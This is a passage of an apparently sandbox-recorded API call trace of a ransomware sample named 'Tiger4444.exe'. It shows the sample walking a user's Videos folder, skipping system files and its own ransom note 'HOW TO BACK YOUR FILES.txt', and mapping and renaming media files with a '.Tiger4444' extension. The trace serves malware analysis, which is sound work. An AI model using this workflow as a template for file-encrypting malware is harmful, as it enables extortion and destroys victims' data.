hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x686bd9c3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x686bd9c3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2="Tiger4444.exe") returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0045.071] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0045.072] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0045.072] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0045.072] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0045.072] lstrcmpiW (lpString1="Videos", lpString2="NTUSER.DAT") returned 1 [0045.072] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0045.072] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos", dwFileAttributes=0x10) returned 1 [0045.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0045.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2e) returned 0xc67598 [0045.072] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc665c8 [0045.072] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x686bd9c3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x686bd9c3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0045.072] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.072] lstrcpyW (in: lpString1=0x30aeac8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.072] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.072] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.073] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.073] CloseHandle (hObject=0x260) returned 1 [0045.073] CloseHandle (hObject=0x2ac) returned 1 [0045.074] GetCurrentThreadId () returned 0xfa8 [0045.074] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0045.074] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0045.074] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67598 | out: hHeap=0xc50000) returned 1 [0045.074] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0045.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos" | out: lpString1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0045.074] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0045.074] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3" [0045.074] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.075] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.096] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.097] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.097] CloseHandle (hObject=0x2ac) returned 1 [0045.098] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos") returned 22 [0045.098] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.098] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x686bd9c3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fe3a952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0045.098] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.098] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.098] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.098] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.098] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x686bd9c3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fe3a952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.098] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.098] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.098] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.098] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.098] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.098] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fe3a952, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fe3a952, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fe60b98, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.098] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.098] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.098] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd89039e0, ftCreationTime.dwHighDateTime=0x1d4ca1d, ftLastAccessTime.dwLowDateTime=0xd51dedd0, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0xd51dedd0, ftLastWriteTime.dwHighDateTime=0x1d4cb8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1GssRSL s5Lr83", cAlternateFileName="1GSSRS~1")) returned 1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="Tiger4444.exe") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2=".") returned 1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="..") returned 1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="windows") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="bootmgr") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="pagefile.sys") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="boot") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="ids.txt") returned -1 [0045.098] lstrcmpiW (lpString1="1GssRSL s5Lr83", lpString2="NTUSER.DAT") returned -1 [0045.098] lstrcpyW (in: lpString1=0x30aead6, lpString2="1GssRSL s5Lr83" | out: lpString1="1GssRSL s5Lr83") returned="1GssRSL s5Lr83" [0045.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0045.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c) returned 0xc5e610 [0045.098] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc665c8 [0045.099] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ac830, ftCreationTime.dwHighDateTime=0x1d4c5a8, ftLastAccessTime.dwLowDateTime=0x39760910, ftLastAccessTime.dwHighDateTime=0x1d4cf05, ftLastWriteTime.dwLowDateTime=0x39760910, ftLastWriteTime.dwHighDateTime=0x1d4cf05, nFileSizeHigh=0x0, nFileSizeLow=0x655, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2NnCc4KzPlFvi.swf", cAlternateFileName="2NNCC4~1.SWF")) returned 1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="Tiger4444.exe") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2=".") returned 1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="..") returned 1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="windows") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="bootmgr") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="pagefile.sys") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="boot") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="ids.txt") returned -1 [0045.099] lstrcmpiW (lpString1="2NnCc4KzPlFvi.swf", lpString2="NTUSER.DAT") returned -1 [0045.099] lstrcpyW (in: lpString1=0x30aead6, lpString2="2NnCc4KzPlFvi.swf" | out: lpString1="2NnCc4KzPlFvi.swf") returned="2NnCc4KzPlFvi.swf" [0045.099] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\2NnCc4KzPlFvi.swf", dwFileAttributes=0x0) returned 1 [0045.099] lstrlenW (lpString="2NnCc4KzPlFvi.swf") returned 17 [0045.099] lstrlenW (lpString="Tiger4444") returned 9 [0045.099] lstrcmpiW (lpString1="PlFvi.swf", lpString2="Tiger4444") returned -1 [0045.099] lstrlenW (lpString=".dll") returned 4 [0045.099] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0045.099] lstrlenW (lpString=".lnk") returned 4 [0045.099] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0045.099] lstrlenW (lpString=".ini") returned 4 [0045.099] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0045.099] lstrlenW (lpString=".sys") returned 4 [0045.099] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0045.099] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\2NnCc4KzPlFvi.swf" (normalized: "c:\\users\\fd1hvy\\videos\\2nncc4kzplfvi.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.099] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.100] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13655263419) returned 1 [0045.100] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1621) returned 1 [0045.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0045.100] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x960, lpName=0x0) returned 0x2c8 [0045.100] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x960) returned 0xbe0000 [0045.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.101] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13655416438) returned 1 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0045.101] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.101] CloseHandle (hObject=0x2c8) returned 1 [0045.101] CloseHandle (hObject=0x260) returned 1 [0045.103] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\2NnCc4KzPlFvi.swf.Tiger4444") returned 50 [0045.103] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\2NnCc4KzPlFvi.swf" (normalized: "c:\\users\\fd1hvy\\videos\\2nncc4kzplfvi.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\2NnCc4KzPlFvi.swf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\2nncc4kzplfvi.swf.tiger4444"), dwFlags=0x1) returned 1 [0045.104] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1632 | out: Addend=0xc6f980) returned 15208720 [0045.104] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4407 [0045.104] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed31dc60, ftCreationTime.dwHighDateTime=0x1d4c69d, ftLastAccessTime.dwLowDateTime=0xaea99eb0, ftLastAccessTime.dwHighDateTime=0x1d4c977, ftLastWriteTime.dwLowDateTime=0xaea99eb0, ftLastWriteTime.dwHighDateTime=0x1d4c977, nFileSizeHigh=0x0, nFileSizeLow=0x11ade, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5K6QHDJbfIWjYG262dir.avi", cAlternateFileName="5K6QHD~1.AVI")) returned 1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="Tiger4444.exe") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2=".") returned 1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="..") returned 1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="windows") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="bootmgr") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="pagefile.sys") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="boot") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="ids.txt") returned -1 [0045.104] lstrcmpiW (lpString1="5K6QHDJbfIWjYG262dir.avi", lpString2="NTUSER.DAT") returned -1 [0045.104] lstrcpyW (in: lpString1=0x30aead6, lpString2="5K6QHDJbfIWjYG262dir.avi" | out: lpString1="5K6QHDJbfIWjYG262dir.avi") returned="5K6QHDJbfIWjYG262dir.avi" [0045.104] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\5K6QHDJbfIWjYG262dir.avi", dwFileAttributes=0x0) returned 1 [0045.104] lstrlenW (lpString="5K6QHDJbfIWjYG262dir.avi") returned 24 [0045.104] lstrlenW (lpString="Tiger4444") returned 9 [0045.104] lstrcmpiW (lpString1="62dir.avi", lpString2="Tiger4444") returned -1 [0045.104] lstrlenW (lpString=".dll") returned 4 [0045.104] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.104] lstrlenW (lpString=".lnk") returned 4 [0045.105] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.105] lstrlenW (lpString=".ini") returned 4 [0045.105] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.105] lstrlenW (lpString=".sys") returned 4 [0045.105] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\5K6QHDJbfIWjYG262dir.avi" (normalized: "c:\\users\\fd1hvy\\videos\\5k6qhdjbfiwjyg262dir.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.105] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.105] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13655813756) returned 1 [0045.105] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=72414) returned 1 [0045.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0045.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0045.105] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11de0, lpName=0x0) returned 0x2c8 [0045.105] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11de0) returned 0xbe0000 [0045.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.107] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13656023841) returned 1 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0045.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0045.107] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.108] CloseHandle (hObject=0x2c8) returned 1 [0045.108] CloseHandle (hObject=0x260) returned 1 [0045.115] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\5K6QHDJbfIWjYG262dir.avi.Tiger4444") returned 57 [0045.115] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\5K6QHDJbfIWjYG262dir.avi" (normalized: "c:\\users\\fd1hvy\\videos\\5k6qhdjbfiwjyg262dir.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\5K6QHDJbfIWjYG262dir.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\5k6qhdjbfiwjyg262dir.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.115] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=72416 | out: Addend=0xc6f980) returned 15210352 [0045.115] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4408 [0045.115] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc126d0, ftCreationTime.dwHighDateTime=0x1d4d59a, ftLastAccessTime.dwLowDateTime=0x51a96bd0, ftLastAccessTime.dwHighDateTime=0x1d4cfcd, ftLastWriteTime.dwLowDateTime=0x51a96bd0, ftLastWriteTime.dwHighDateTime=0x1d4cfcd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B0M8WjsC5SrNW4C-0", cAlternateFileName="B0M8WJ~1")) returned 1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="Tiger4444.exe") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2=".") returned 1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="..") returned 1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="windows") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="bootmgr") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="pagefile.sys") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="boot") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="ids.txt") returned -1 [0045.116] lstrcmpiW (lpString1="B0M8WjsC5SrNW4C-0", lpString2="NTUSER.DAT") returned -1 [0045.116] lstrcpyW (in: lpString1=0x30aead6, lpString2="B0M8WjsC5SrNW4C-0" | out: lpString1="B0M8WjsC5SrNW4C-0") returned="B0M8WjsC5SrNW4C-0" [0045.116] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0045.116] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x52) returned 0xc60fe8 [0045.116] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc663a8 [0045.116] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafef8d30, ftCreationTime.dwHighDateTime=0x1d4d0bf, ftLastAccessTime.dwLowDateTime=0x600af20, ftLastAccessTime.dwHighDateTime=0x1d4cb74, ftLastWriteTime.dwLowDateTime=0x600af20, ftLastWriteTime.dwHighDateTime=0x1d4cb74, nFileSizeHigh=0x0, nFileSizeLow=0x14142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ccn85Ai_.mp4", cAlternateFileName="")) returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="Tiger4444.exe") returned -1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2=".") returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="..") returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="windows") returned -1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="bootmgr") returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="pagefile.sys") returned -1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="boot") returned 1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="ids.txt") returned -1 [0045.116] lstrcmpiW (lpString1="ccn85Ai_.mp4", lpString2="NTUSER.DAT") returned -1 [0045.116] lstrcpyW (in: lpString1=0x30aead6, 